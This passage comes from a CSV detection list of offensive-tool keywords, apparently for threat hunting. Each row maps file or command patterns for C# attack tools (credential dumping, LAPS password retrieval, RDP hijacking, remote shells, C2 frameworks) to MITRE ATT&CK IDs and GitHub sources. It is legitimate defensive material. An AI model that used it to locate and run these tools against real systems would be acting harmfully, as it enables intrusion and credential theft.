4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpKatz.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpKatz.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*SharpkatzManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpLAPS.*","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","338","68","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" +"*SharpLAPS.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpLAPS-main*","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","338","68","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" +"*SharpLDAP.csproj*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" +"*SharpLDAP.exe*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" +"*SharpLDAP.sln*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" +"*SharpLDAP-main*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" +"*SharpLdapRelayScan*","offensive_tool_keyword","SharpLdapRelayScan","SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","7","1","72","16","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z" +"*SharpLdapRelayScan*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*SharpMapExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpMiniDump*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpMiniDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpMiniDumpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpMove.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpNamedPipePTH.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpNoPSExec.csproj*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"*SharpNoPSExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpNoPSExec.exe*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"*SharpNoPSExec.sln*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"*SharpNoPSExec-master*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"*SharpPack*","offensive_tool_keyword","SharpPack","SharpPack is a toolkit for insider threat assessments that lets you defeat application whitelisting to execute arbitrary DotNet and PowerShell tools.","T1218.010 - T1218.011 - T1059 - T1127 - T1055","TA0002 - TA0008 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/mdsecactivebreach/SharpPack","1","0","N/A","N/A","2","145","34","2018-12-17T11:55:12Z","2018-12-17T10:51:19Z" +"*SharpPrinter.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpPrintNightmare*","offensive_tool_keyword","SharpPrintNightmare","C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527","T1210 - T1574 - T1204 - T1053 - T1021 - T1068 - T1071","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Exploitation tools","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","1736","587","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z" +"*sharpps $psversiontable*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*sharpps get-process*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*sharppsexec*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpPsExecManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpPsExecService.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpRDP.*.dll.bin*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.csproj*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpRDP.exe*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.sln*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDPHijack.cs*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" +"*SharpRDPHijack.exe*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" +"*SharpRDPHijack-master*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" +"*SharpRDP-master*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*Sharpreflect *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*SharpReg.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpRoast.exe*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","857","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" +"*sharpsc *cmd*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpSCCM*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"*SharpSCCM.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSCShell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*SharpSearch.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSecDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpsecretsdump*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*SharpShares.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpShellPipe.exe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*SharpShellPipe.sln*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*SharpShellPipe-main*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*SharpShooter*","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1564 - T1204 - T1059 - T1105","TA0002 - TA0011 - TA0008","N/A","N/A","Frameworks","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","1683","352","2022-03-16T15:36:54Z","2018-03-06T20:04:20Z" +"*SharpShot.exe /*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*Sharp-SMBExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - 